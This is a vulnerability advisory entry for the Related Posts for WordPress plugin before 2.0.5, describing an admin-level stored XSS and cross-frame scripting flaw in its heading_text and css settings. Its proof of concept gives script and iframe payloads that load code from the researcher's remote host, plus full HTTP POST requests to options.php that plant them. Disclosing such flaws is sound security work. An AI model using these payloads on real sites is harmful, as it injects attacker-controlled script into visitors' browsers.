WordPress Plugin Vulnerabilities
Related Posts for WordPress < 2.0.5 - Authenticated Stored XSS & XFS
Description
The plugin does not sanitise its heading_text and css settings, allowing high privilege users (admin) to set XSS payloads in them, leading to Stored Cross-Site Scripting issues.
Proof of Concept
Payloads: [$] m0ze"><script src=//m0ze.ru/payload/a.js></script><div x [$] m0ze</textarea><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x PoC #1 | Authenticated Persistent XSS & XFS | Heading text: [!] POST /wp-admin/options.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 480 option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x PoC #2 | Authenticated Persistent XSS & XFS | CSS: [!] POST /wp-admin/options.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 480 option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-17 (about 2 years ago)
Added
2021-06-25 (about 2 years ago)
Last Updated
2022-01-02 (about 2 years ago)